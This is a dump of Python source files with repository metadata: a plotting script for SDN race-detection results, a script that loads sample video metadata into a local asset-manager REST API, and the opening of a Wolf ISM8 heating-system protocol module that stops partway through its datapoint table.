        'trace_pox_ConsistencyTopology-False-False-steps200': True,
        'trace_pox_ConsistencyTopology-False-True-steps200': True,
        'trace_pox_ConsistencyTopology-True-False-steps200': True,
        'trace_pox_ConsistencyTopology-True-True-steps200': True,
        'trace_onos-ifwd-StarTopology2-steps200': False,
        'trace_onos-ifwd-MeshTopology2-steps200': False,
        'trace_onos-ifwd-BinaryLeafTreeTopology1-steps200': False,
        'trace_onos-ifwd-BinaryLeafTreeTopology2-steps200': False,
        'trace_onos-noinstr-ifwd-StarTopology2-steps200': False,
        'trace_onos-noinstr-ifwd-MeshTopology2-steps200': False,
        'trace_onos-noinstr-ifwd-BinaryLeafTreeTopology1-steps200': False,
        'trace_onos-noinstr-ifwd-BinaryLeafTreeTopology2-steps200': False,
    }
    if name not in prefix_for_name:
        # Unknown trace: warn and implicitly return None, as before.
        print("get_correct_alt_barr_prefix() unknown for " + name)
        return  # nothing
    return 'True-' if prefix_for_name[name] else 'False-'
if __name__ == '__main__':
    # CLI entry point: takes one or more result directories (or summary.csv paths).
    parser = argparse.ArgumentParser()
    parser.add_argument('result_dirs', nargs='+' )
    parser.add_argument('--no-plots', dest='no_plots', action='store_true',
                        default=False, help="Do not write any plot PDFs to the disk.")
    args = parser.parse_args()
    # NOTE(review): main() is not defined in this copy of the file -- confirm
    # it is provided by the full module.
    main(args.result_dirs, args.no_plots)
| 37.871391 | 168 | 0.662069 | #!/usr/bin/env python
import argparse
import csv
import glob
import os
import itertools
from pylab import *
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
from asyncore import loop
# Values we care about
keys = []
keys.append('num_read')
keys.append('num_writes')
keys.append('num_ops')
keys.append('num_rw_time_edges')
keys.append('num_ww_time_edges')
keys.append('num_time_edges')
keys.append('num_harmful')
keys.append('num_commute')
keys.append('num_races')
keys.append('num_covered')
keys.append('num_per_pkt_races')
keys.append('num_per_pkt_inconsistent')
keys.append('num_per_pkt_inconsistent_covered')
keys.append('num_per_pkt_entry_version_race')
keys.append('num_per_pkt_inconsistent_no_repeat')
keys.append('total_time_sec')
keys.append('load_time_sec')
keys.append('detect_races_time_sec')
keys.append('extract_traces_time_sec')
keys.append('find_reactive_cmds_time_sec')
keys.append('find_proactive_cmds_time_sec')
keys.append('find_covered_races_time')
keys.append('per_packet_inconsistent_time_sec')
keys.append('find_inconsistent_update_time_sec')
per_pkt_consistency = ['num_per_pkt_races', 'num_per_pkt_inconsistent',
'num_per_pkt_inconsistent_covered',
'num_per_pkt_entry_version_race']
prefixes = ['True-','False-']
timing_values = {'0': 0,
'1': 1,
'2': 2,
'3': 3,
'4': 4,
'5': 5,
'6': 6,
'7': 7,
'8': 8,
'9': 9,
'10': 10,
'inf': 11, # hack for plots
}
sorted_timing_values = sorted(timing_values.items(), key=lambda x: x[1])
# http://matplotlib.org/api/markers_api.html
markers = ['x',
'+',
'.',
'o',
'*',
# ',',
'1',
'2',
'3',
'4',
'8',
'<',
'>',
'D',
'H',
'^',
'_',
'd',
'h',
'p',
's',
'v',
'|',
0,
1,
2,
3,
4,
5,
6,
7,]
def main(result_dirs, no_plots=False):
    """Load each run's summary.csv into nested lookup tables and, unless
    ``no_plots`` is set, render the summary PDFs.

    Args:
        result_dirs: result directories (or direct .csv paths); each must
            contain / be a summary.csv whose header row starts with 'key/t'.
        no_plots: when True, only parse the CSVs and skip all plotting.
    """
    tables = {}
    base_names = []
    lookup_tables = {}
    row_mapping = {}
    col_mapping = {}
    for p in prefixes:
        tables[p] = {}
    for name in result_dirs:
        fname = name
        if not fname.endswith('.csv'):
            fname = os.path.join(name, 'summary.csv')
        with open(fname) as csvfile:
            table = {}
            keys = []
            # Directory (or file) base name identifies the run; must be unique.
            base_name = os.path.basename(os.path.normpath(name))
            assert base_name not in base_names
            base_names.append(base_name)
            csviter = csv.reader(csvfile, delimiter=',')
            csvdata = []
            for row in csviter:
                csvdata.append(row)
            lookup_tables[base_name] = {}
            row_mapping[base_name] = {}
            for ridx,row in enumerate(csvdata):
                # first row has to contain header
                # generate a lookup table
                key = row[0]
                if ridx == 0:
                    assert key == 'key/t'
                    row_mapping[base_name][ridx] = key
                    col_mapping[base_name] = {}
                    for cidx, col_name in enumerate(row):
                        col_mapping[base_name][cidx] = col_name
                        lookup_tables[base_name][col_name] = {}
                else:
                    assert base_name in col_mapping
                    row_mapping[base_name][ridx] = key
                    # lookup_tables[base_name][column][row-key] -> cell value.
                    for cidx, field_value in enumerate(row):
                        col_name = col_mapping[base_name][cidx]
                        lookup_tables[base_name][col_name][key] = field_value
            for p in prefixes:
                table[p] = {}
                col_names_with_prefix = {}
                # Collect the columns belonging to this prefix and their
                # integer timing values (see module-level timing_values).
                for col_name in lookup_tables[base_name]:
                    if col_name != 'key/t' and str(col_name).startswith(p):
                        timing_str = str(col_name).partition(p)[2]
                        assert timing_str in timing_values
                        timing_as_integer = timing_values[timing_str]
                        col_names_with_prefix[col_name] = timing_as_integer
                # sort by timing so that pyplot can understand it, tuples of (key, value)
                sorted_col_names_with_prefix = sorted(col_names_with_prefix.items(), key=lambda x: x[1])
                # Python 2: dict.iteritems(); row 0 stores the timings
                # themselves, other rows the corresponding metric values.
                for ridx,key in row_mapping[base_name].iteritems():
                    row_values = []
                    if ridx == 0:
                        for col_name, timing in sorted_col_names_with_prefix:
                            row_values.append(timing)
                        table[p][key] = row_values
                    else:
                        for col_name, timing in sorted_col_names_with_prefix:
                            field_value = lookup_tables[base_name][col_name][key]
                            row_values.append(field_value)
                        table[p][key] = row_values
                tables[p][base_name] = table[p]
    keys_to_plot = ['num_harmful', 'num_commute', 'num_races', 'num_rw_time_edges', 'num_ww_time_edges',
                    'num_per_pkt_races', 'num_per_pkt_inconsistent', 'num_per_pkt_inconsistent_covered', 'num_per_pkt_entry_version_race', 'num_per_pkt_inconsistent_no_repeat']
    if not no_plots:
        # Plot summaries for all values
        # NOTE(review): plot_with_delta / plot_with_delta_multiple /
        # get_short_name are not visible in this chunk -- confirm they are
        # defined elsewhere in the module.
        for p in prefixes:
            for key in keys_to_plot:
                plot_with_delta(tables[p], p, key, False)
            for name in tables[p]:
                plot_with_delta_multiple(tables[p], p, name,
                                         out_name=get_short_name(name) + "_pkt_consist",
                                         keys=per_pkt_consistency,
                                         use_log=False)
                plot_with_delta_multiple(tables[p], p, name,
                                         out_name=get_short_name(name) + "_overview_covered_races",
                                         keys=['num_harmful',
                                               'num_covered'],
                                         use_log=True)
                plot_with_delta_multiple(tables[p], p, name,
                                         out_name=get_short_name(name) + "_overview_covered_traces",
                                         keys=['num_per_pkt_inconsistent',
                                               'num_per_pkt_inconsistent_covered',
                                               'num_per_pkt_entry_version_race',
                                               'num_per_pkt_inconsistent_no_repeat'],
                                         use_log=True)
def get_correct_alt_barr_prefix(name):
    """
    Whether to use alt-barr results or not. Should be True for purely
    reactive controllers, and False for proactive controllers that use
    barriers.

    Returns 'True-' or 'False-' for known trace names; for unknown names
    a warning is printed and None is returned.
    """
    # Lookup table: trace name -> use alt-barr results (True) or not (False).
    # Floodlight learningswitch/forwarding and the POX consistency traces are
    # purely reactive; circuitpusher and the ONOS traces use barriers.
    use_alt_barr = {
        'trace_floodlight_learningswitch-StarTopology2-steps200': True,
        'trace_floodlight_learningswitch-StarTopology4-steps200': True,
        'trace_floodlight_learningswitch-StarTopology8-steps200': True,
        'trace_floodlight_learningswitch-BinaryLeafTreeTopology1-steps200': True,
        'trace_floodlight_learningswitch-BinaryLeafTreeTopology2-steps200': True,
        'trace_floodlight_forwarding-StarTopology2-steps200': True,
        'trace_floodlight_forwarding-StarTopology4-steps200': True,
        'trace_floodlight_forwarding-StarTopology8-steps200': True,
        'trace_floodlight_forwarding-BinaryLeafTreeTopology1-steps200': True,
        'trace_floodlight_forwarding-BinaryLeafTreeTopology2-steps200': True,
        'trace_floodlight_circuitpusher-BinaryLeafTreeTopology1-steps200': False,
        'trace_floodlight_circuitpusher-BinaryLeafTreeTopology2-steps200': False,
        # POX consistency traces: (consistent, barriers) encoded in the name.
        'trace_pox_ConsistencyTopology-False-False-steps200': True,
        'trace_pox_ConsistencyTopology-False-True-steps200': True,
        'trace_pox_ConsistencyTopology-True-False-steps200': True,
        'trace_pox_ConsistencyTopology-True-True-steps200': True,
        'trace_onos-ifwd-StarTopology2-steps200': False,
        'trace_onos-ifwd-MeshTopology2-steps200': False,
        'trace_onos-ifwd-BinaryLeafTreeTopology1-steps200': False,
        'trace_onos-ifwd-BinaryLeafTreeTopology2-steps200': False,
        'trace_onos-noinstr-ifwd-StarTopology2-steps200': False,
        'trace_onos-noinstr-ifwd-MeshTopology2-steps200': False,
        'trace_onos-noinstr-ifwd-BinaryLeafTreeTopology1-steps200': False,
        'trace_onos-noinstr-ifwd-BinaryLeafTreeTopology2-steps200': False,
    }
    if name not in use_alt_barr:
        # print(...) with a single argument behaves identically on
        # Python 2 (parenthesized expression) and Python 3.
        print("get_correct_alt_barr_prefix() unknown for " + name)
        return None
    return 'True-' if use_alt_barr[name] else 'False-'
def get_short_name(name):
    """Abbreviate a trace name for use in plot labels and output file names.

    Applies a fixed sequence of textual abbreviations. The order of the
    replacements matters (e.g. the combined 'False-False' -> 'IW' rewrites
    must run as whole-token replacements before anything could split them),
    so the table below must stay ordered.
    """
    replacements = (
        ('trace_', ''),
        # controller names
        ('floodlight', 'FL'),
        ('pox', 'PX'),
        ('onos', 'ON'),
        # topology names
        ('MeshTopology', 'me'),
        ('GridTopology', 'gr'),
        ('BinaryLeafTreeTopology', 'bt'),
        ('ConsistencyTopology', 'ct'),
        ('StarTopology', 'st'),
        # (consistent, barriers) flag pairs for the consistency traces:
        # Inconsistent/Consistent x Wait/Barriers
        ('False-False', 'IW'),
        ('False-True', 'IB'),
        ('True-False', 'CW'),
        ('True-True', 'CB'),
        # application names
        ('forwarding', 'fwd'),
        ('learningswitch', 'lrn'),
        ('circuitpusher', 'crc'),
        ('l2_multi', 'l2m'),
        # step counts
        ('-steps100', '-100'),
        ('-steps200', '-200'),
    )
    short_name = name
    for old, new in replacements:
        short_name = short_name.replace(old, new)
    return short_name
def plot_with_delta_multiple(tables, prefix, name, keys, out_name, use_log=True, formatter=int):
    """Plot several metrics of a single trace against epsilon and save a PDF.

    tables    -- dict: trace name -> {metric key -> list of values}; the
                 special metric 'key/t' holds the x-axis (epsilon) values.
    prefix    -- timing prefix, also prepended to the output file name.
    name      -- trace name to plot (used as figure title and table key).
    keys      -- metric keys to draw, one line per key.
    out_name  -- base name of the output PDF ('<prefix><out_name>.pdf').
    use_log   -- if True, use a logarithmic y axis with plain tick labels.
    formatter -- callable applied to every raw table value (default: int).
    """
    plt.clf()
    fig = plt.figure()
    fig.suptitle(name, fontsize=14, fontweight='bold')
    ax = fig.add_subplot(111)
    ax.grid(True)
    marker = itertools.cycle(markers)  # repeat marker shapes forever
    ax.set_xlabel(r'$\epsilon$')
    table = tables[name]
    for key in keys:
        values = [formatter(x) for x in table[key]]
        # next(marker) instead of marker.next(): works on Python 2.6+ and 3.
        ax.plot(table['key/t'], values, label=get_short_name(key),
                marker=next(marker))
    if use_log:
        ax.set_yscale('log')
        ax.yaxis.set_major_formatter(ScalarFormatter())
        ax.ticklabel_format(style='plain', axis='y')
    plt.legend(bbox_to_anchor=(1, 1), bbox_transform=plt.gcf().transFigure)
    # Shrink the axes height by 20% at the bottom to make room for the
    # legend that is placed below the plot.
    box = ax.get_position()
    ax.set_position([box.x0, box.y0 + box.height * 0.2,
                     box.width, box.height * 0.8])
    # Put a legend below the current axis.
    ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.1),
              fancybox=True, shadow=True, ncol=1, prop={'size': 6})
    fname = '%s%s.pdf' % (prefix, out_name)
    print(fname)
    pp = PdfPages(fname)
    fig.savefig(pp, format='pdf')
    pp.close()
    plt.close(fig)
def plot_with_delta(tables, prefix, key, use_log=True, formatter=int):
    """Plot one metric ``key`` for every trace in ``tables`` and save a PDF.

    tables    -- dict: trace name -> {metric key -> list of values}; the
                 special metric 'key/t' holds the x-axis (epsilon) values.
    prefix    -- timing prefix, also prepended to the output file name.
    key       -- metric to plot; one line per trace, file '<prefix><key>.pdf'.
    use_log   -- if True, use a logarithmic y axis with plain tick labels.
    formatter -- callable applied to every raw table value (default: int).
    """
    plt.clf()
    fig = plt.figure()
    fig.suptitle(key, fontsize=14, fontweight='bold')
    ax = fig.add_subplot(111)
    ax.grid(True)
    marker = itertools.cycle(markers)  # repeat marker shapes forever
    ax.set_xlabel(r'$\epsilon$')
    ax.set_ylabel(key)
    for name in tables:
        values = [formatter(x) for x in tables[name][key]]
        # next(marker) instead of marker.next(): works on Python 2.6+ and 3.
        ax.plot(tables[name]['key/t'], values, label=get_short_name(name),
                marker=next(marker))
    if use_log:
        ax.set_yscale('log')
        ax.yaxis.set_major_formatter(ScalarFormatter())
        ax.ticklabel_format(style='plain', axis='y')
    plt.legend(bbox_to_anchor=(1, 1), bbox_transform=plt.gcf().transFigure)
    # Shrink the axes height by 20% at the bottom to make room for the
    # legend that is placed below the plot.
    box = ax.get_position()
    ax.set_position([box.x0, box.y0 + box.height * 0.2,
                     box.width, box.height * 0.8])
    # Put a legend below the current axis.
    ax.legend(loc='upper center', bbox_to_anchor=(0.5, -0.1),
              fancybox=True, shadow=True, ncol=1, prop={'size': 6})
    fname = '%s%s.pdf' % (prefix, key)
    print(fname)
    pp = PdfPages(fname)
    fig.savefig(pp, format='pdf')
    pp.close()
    plt.close(fig)
if __name__ == '__main__':
    # Command line: one or more result directories to analyze, plus an
    # optional flag to suppress writing the PDF plots.
    parser = argparse.ArgumentParser()
    parser.add_argument('result_dirs', nargs='+' )
    parser.add_argument('--no-plots', dest='no_plots', action='store_true',
                        default=False, help="Do not write any plot PDFs to the disk.")
    args = parser.parse_args()
    main(args.result_dirs, args.no_plots)
| 8,783 | 0 | 92 |
1c59c47850aa708f1f8006c09f199f92f56b6546 | 6,881 | py | Python | src/pack/bin/simple_setup.py | mbari-media-management/vampire-squid | 4e9c380daf47fbdb4215e614e65eb504bb63cda1 | [
"Apache-2.0"
] | 5 | 2019-06-26T18:18:53.000Z | 2021-12-04T18:12:43.000Z | src/pack/bin/simple_setup.py | mbari-media-management/vampire-squid | 4e9c380daf47fbdb4215e614e65eb504bb63cda1 | [
"Apache-2.0"
] | 1 | 2019-02-28T18:06:56.000Z | 2019-03-01T00:50:06.000Z | src/pack/bin/simple_setup.py | mbari-media-management/vampire-squid | 4e9c380daf47fbdb4215e614e65eb504bb63cda1 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# This is a script for loading some test data into the video-asset-manager using
# REST calls. Each insert is being done as a separate call, which is the only type of
# insert that the API supports at this point.
#
# Note that for production loads, we would not do this in this manner. Instead, we might
# use a script that takes a few parameters (e.g. file URL, camera_id) then
# - auto-generates some parameters, such as video-sequence name and video name.
# - parses the other metadata from the video file as json, using something like ffprobe
# - maps the json from ffprobe to the asset managers metadata.
# - generates the video-sequence and video objects via API's calls as needed.
import requests
import json
base_url = "http://localhost:8080/v1/"
vs_url = base_url + "videosequence"
v_url = base_url + "video"
vr_url = base_url + "videoreference"
vs1 = read(vs_url,
data = {"name": "T0097",
"camera_id": "Tiburon"})
v1_1 = read(v_url,
data = {"name": "T0097-01",
"start": "2016-04-05T00:01:00Z",
"duration_millis": 15 * 60 * 1000,
"video_sequence_uuid": vs1["uuid"]})
vr1_1_1 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/T0097_20160405T000100Z.mov",
"video_uuid": v1_1["uuid"],
"container": "video/quicktime",
"video_codec": "ProRes HQ",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
vr1_1_2 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/T0097_20160405T000100Z.mp4",
"video_uuid": v1_1["uuid"],
"container": "video/mp4",
"video_codec": "H.264",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
v1_2 = read(v_url,
data = {"name": "T0097-02",
"start": "2016-04-05T00:01:15Z",
"duration_millis": 15 * 60 * 1000,
"video_sequence_uuid": vs1["uuid"],
"description": "This video is cool"})
vr1_2_1 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/T0097_20160405T000115Z.mov",
"video_uuid": v1_2["uuid"],
"container": "video/quicktime",
"video_codec": "ProRes HQ",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
vr1_2_2 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/T0097_20160405T000115Z.mp4",
"video_uuid":v1_2["uuid"],
"container":"video/mp4",
"video_codec":"H.264",
"audio_codec":"AAC",
"width":1920,
"height":1080,
"frame_rate":19})
v1_3 = read(v_url,
data = {"name": "T0097-01HD",
"start": "2016-04-05T00:01:00Z",
"duration_millis": 45 * 60 * 1000,
"video_sequence_uuid": vs1["uuid"],
"description": "This is a reference to a tape that overlaps with video files"})
vr1_3_1 = read(vr_url,
data = {"uri": "urn:T0097-01HD",
"video_uuid": v1_3["uuid"],
"width": 1920,
"height": 1080,
"frame_rate": 29.97,
"description": "D5 Tape"})
vs2 = read(vs_url,
data = {"name": "V1234", "camera_id": "Ventana"})
v2_1 = read(v_url,
data = {"name": "V1234-01",
"start": "2016-06-12T00:18:31Z",
"duration_millis": 15 * 60 * 1000,
"video_sequence_uuid": vs2["uuid"]})
vr2_1_1 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V1234_20160612T001831.mov",
"video_uuid": v2_1["uuid"],
"container": "video/quicktime",
"video_codec": "ProRes HQ",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
vr2_1_2 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V1234_20160612T001831.mp4",
"video_uuid": v2_1["uuid"],
"container": "video/mp4",
"video_codec": "H.264",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 19})
vs3 = read(vs_url,
data = {"name": "V9931", "camera_id": "Ventana"})
v3_1 = read(v_url,
data = {"name": "V9931-01",
"start": "2011-12-12T00:00:10Z",
"duration_millis": 45 * 60 * 1000,
"video_sequence_uuid": vs3["uuid"]})
vr3_1_1 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V9931_201101212T000010Z.mov",
"video_uuid": v3_1["uuid"],
"container": "video/quicktime",
"video_codec": "ProRes HQ",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
vr3_1_2 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V9931_201101212T000010Z.mp4",
"video_uuid": v3_1["uuid"],
"container": "video/mp4",
"video_codec": "H.264",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 30})
vr3_1_3 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V9931_201101212T000010Z_midres.mp4",
"video_uuid": v3_1["uuid"],
"container": "video/mp4",
"video_codec": "H.264",
"audio_codec": "AAC",
"width": 720,
"height": 640,
"frame_rate": 19})
print("--- Database Dump -----------------------------------------------------")
db_dump = json.loads(requests.get(v_url).text)
print(json.dumps(db_dump, sort_keys=True, indent=2, separators=(',', ': '))) | 43.828025 | 99 | 0.46098 | #!/usr/bin/env python
# This is a script for loading some test data into the video-asset-manager using
# REST calls. Each insert is being done as a separate call, which is the only type of
# insert that the API supports at this point.
#
# Note that for production loads, we would not do this in this manner. Instead, we might
# use a script that takes a few parameters (e.g. file URL, camera_id) then
# - auto-generates some parameters, such as video-sequence name and video name.
# - parses the other metadata from the video file as json, using something like ffprobe
# - maps the json from ffprobe to the asset managers metadata.
# - generates the video-sequence and video objects via API's calls as needed.
import requests
import json
def read(url, data=None):
    """POST form-encoded ``data`` to ``url`` and return the decoded JSON body.

    Despite its name this issues a POST (the asset manager API creates or
    returns entities via POST). ``data`` defaults to an empty payload;
    the original code used a mutable default argument (``data={}``),
    which is a latent bug since the same dict would be shared between
    calls -- a fresh empty dict is now used per call instead.
    """
    r = requests.post(url, data if data is not None else {})
    return json.loads(r.text)
# Endpoints of the video asset manager REST API (local test instance).
base_url = "http://localhost:8080/v1/"
vs_url = base_url + "videosequence"  # video sequences (e.g. one dive)
v_url = base_url + "video"  # individual videos within a sequence
vr_url = base_url + "videoreference"  # concrete encodings/files of a video
vs1 = read(vs_url,
data = {"name": "T0097",
"camera_id": "Tiburon"})
v1_1 = read(v_url,
data = {"name": "T0097-01",
"start": "2016-04-05T00:01:00Z",
"duration_millis": 15 * 60 * 1000,
"video_sequence_uuid": vs1["uuid"]})
vr1_1_1 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/T0097_20160405T000100Z.mov",
"video_uuid": v1_1["uuid"],
"container": "video/quicktime",
"video_codec": "ProRes HQ",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
vr1_1_2 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/T0097_20160405T000100Z.mp4",
"video_uuid": v1_1["uuid"],
"container": "video/mp4",
"video_codec": "H.264",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
v1_2 = read(v_url,
data = {"name": "T0097-02",
"start": "2016-04-05T00:01:15Z",
"duration_millis": 15 * 60 * 1000,
"video_sequence_uuid": vs1["uuid"],
"description": "This video is cool"})
vr1_2_1 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/T0097_20160405T000115Z.mov",
"video_uuid": v1_2["uuid"],
"container": "video/quicktime",
"video_codec": "ProRes HQ",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
vr1_2_2 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/T0097_20160405T000115Z.mp4",
"video_uuid":v1_2["uuid"],
"container":"video/mp4",
"video_codec":"H.264",
"audio_codec":"AAC",
"width":1920,
"height":1080,
"frame_rate":19})
v1_3 = read(v_url,
data = {"name": "T0097-01HD",
"start": "2016-04-05T00:01:00Z",
"duration_millis": 45 * 60 * 1000,
"video_sequence_uuid": vs1["uuid"],
"description": "This is a reference to a tape that overlaps with video files"})
vr1_3_1 = read(vr_url,
data = {"uri": "urn:T0097-01HD",
"video_uuid": v1_3["uuid"],
"width": 1920,
"height": 1080,
"frame_rate": 29.97,
"description": "D5 Tape"})
vs2 = read(vs_url,
data = {"name": "V1234", "camera_id": "Ventana"})
v2_1 = read(v_url,
data = {"name": "V1234-01",
"start": "2016-06-12T00:18:31Z",
"duration_millis": 15 * 60 * 1000,
"video_sequence_uuid": vs2["uuid"]})
vr2_1_1 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V1234_20160612T001831.mov",
"video_uuid": v2_1["uuid"],
"container": "video/quicktime",
"video_codec": "ProRes HQ",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
vr2_1_2 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V1234_20160612T001831.mp4",
"video_uuid": v2_1["uuid"],
"container": "video/mp4",
"video_codec": "H.264",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 19})
vs3 = read(vs_url,
data = {"name": "V9931", "camera_id": "Ventana"})
v3_1 = read(v_url,
data = {"name": "V9931-01",
"start": "2011-12-12T00:00:10Z",
"duration_millis": 45 * 60 * 1000,
"video_sequence_uuid": vs3["uuid"]})
vr3_1_1 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V9931_201101212T000010Z.mov",
"video_uuid": v3_1["uuid"],
"container": "video/quicktime",
"video_codec": "ProRes HQ",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 59.97})
vr3_1_2 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V9931_201101212T000010Z.mp4",
"video_uuid": v3_1["uuid"],
"container": "video/mp4",
"video_codec": "H.264",
"audio_codec": "AAC",
"width": 1920,
"height": 1080,
"frame_rate": 30})
vr3_1_3 = read(vr_url,
data = {"uri": "http://www.mbari.org/foo/bar/V9931_201101212T000010Z_midres.mp4",
"video_uuid": v3_1["uuid"],
"container": "video/mp4",
"video_codec": "H.264",
"audio_codec": "AAC",
"width": 720,
"height": 640,
"frame_rate": 19})
print("--- Database Dump -----------------------------------------------------")
db_dump = json.loads(requests.get(v_url).text)
print(json.dumps(db_dump, sort_keys=True, indent=2, separators=(',', ': '))) | 75 | 0 | 23 |
4c405f7cef7119b297f3b6a357e3b86b8b9f4ec5 | 28,254 | py | Python | wolfism8/ism8.py | nanosonde/python-wolfism8 | 20f4ac2e40a2f711f00a833107e286f802a21364 | [
"MIT"
] | null | null | null | wolfism8/ism8.py | nanosonde/python-wolfism8 | 20f4ac2e40a2f711f00a833107e286f802a21364 | [
"MIT"
] | null | null | null | wolfism8/ism8.py | nanosonde/python-wolfism8 | 20f4ac2e40a2f711f00a833107e286f802a21364 | [
"MIT"
] | null | null | null | """
Module for gathering info from Wolf Heating System via ISM8 adapter
"""
import logging
import asyncio
class Ism8(asyncio.Protocol):
"""
This protocol class is invoked to listen to message from ISM8 module and
feed data into internal data array
"""
ISM_HEADER = b'\x06\x20\xf0\x80'
ISM_CONN_HEADER = b'\x04\x00\x00\x00'
ISM_ACK = b'\xF0\x86\x00\x00\x00\x00\x00'
ISM_POLL = b'\x06\x20\xF0\x80\x00\x16\x04\x00\x00\x00\xF0\xD0'
# constant byte arrays for creating ISM8 network messages
DP_DEVICE = 0
# index of Wolf ISM main device name
DP_NAME = 1
# index of datapoint name
DP_TYPE = 2
# index of datapoint type (as described in Wolf API)
DP_RW = 3
# index of R/W-flag (writing not implemented so far)
DP_UNIT = 4
# index of unit description, if applicable
DATAPOINTS = {
1: ('HG1', 'Stoerung', 'DPT_Switch', False, ''),
2: ('HG1', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
3: ('HG1', 'Brennerleistung', 'DPT_Scaling', False, '%'),
4: ('HG1', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
5: ('HG1', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
6: ('HG1', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
7: ('HG1', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
8: ('HG1', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
9: ('HG1', 'Status Brenner', 'DPT_Switch', False, ''),
10: ('HG1', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
11: ('HG1', 'Status Speicherladepumpe', 'DPT_Switch', False, ''),
12: ('HG1', 'Status 3W-Umschaltventil', 'DPT_OpenClose', False, ''),
13: ('HG1', 'Anlagendruck', 'DPT_Value_Pres', False, 'Pa'),
14: ('HG2', 'Stoerung', 'DPT_Switch', False, ''),
15: ('HG2', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
16: ('HG2', 'Brennerleistung', 'DPT_Scaling', False, '%'),
17: ('HG2', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
18: ('HG2', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
19: ('HG2', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
20: ('HG2', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
21: ('HG2', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
22: ('HG2', 'Status Brenner', 'DPT_Switch', False, ''),
23: ('HG2', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
24: ('HG2', 'Status Speicherladepumpe', 'DPT_Switch', False, ''),
25: ('HG2', 'Status 3W-Umschaltventil', 'DPT_OpenClose', False, ''),
26: ('HG2', 'Anlagendruck', 'DPT_Value_Pres', False, 'Pa'),
27: ('HG3', 'Stoerung', 'DPT_Switch', False, ''),
28: ('HG3', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
29: ('HG3', 'Brennerleistung', 'DPT_Scaling', False, '%'),
30: ('HG3', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
31: ('HG3', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
32: ('HG3', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
33: ('HG3', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
34: ('HG3', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
35: ('HG3', 'Status Brenner', 'DPT_Switch', False, ''),
36: ('HG3', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
37: ('HG3', 'Status Speicherladepumpe', 'DPT_Switch', False, ''),
38: ('HG3', 'Status 3W-Umschaltventil', 'DPT_OpenClose', False, ''),
39: ('HG3', 'Anlagendruck', 'DPT_Value_Pres', False, 'Pa'),
40: ('HG4', 'Stoerung', 'DPT_Switch', False, ''),
41: ('HG4', 'Betriebsart', 'DPT_HVACContrMode', False, ''),
42: ('HG4', 'Brennerleistung', 'DPT_Scaling', False, '%'),
43: ('HG4', 'Kesseltemperatur', 'DPT_Value_Temp', False, 'C'),
44: ('HG4', 'Sammlertemperatur', 'DPT_Value_Temp', False, 'C'),
45: ('HG4', 'Ruecklauftemperatur', 'DPT_Value_Temp', False, 'C'),
46: ('HG4', 'Warmwassertemperatur', 'DPT_Value_Temp', False, 'C'),
47: ('HG4', 'Aussentemperatur', 'DPT_Value_Temp', False, 'C'),
48: ('HG4', 'Status Brenner', 'DPT_Switch', False, ''),
49: ('HG4', 'Status Heizkreispumpe', 'DPT_Switch', False, ''),
50: ('HG4', 'Status Speicherladepumpe', 'DPT_Switch', False, ''),
51: ('HG4', 'Status 3W-Umschaltventil', 'DPT_OpenClose', False, ''),
52: ('HG4', 'Anlagendruck', 'DPT_Value_Pres', False, 'a'),
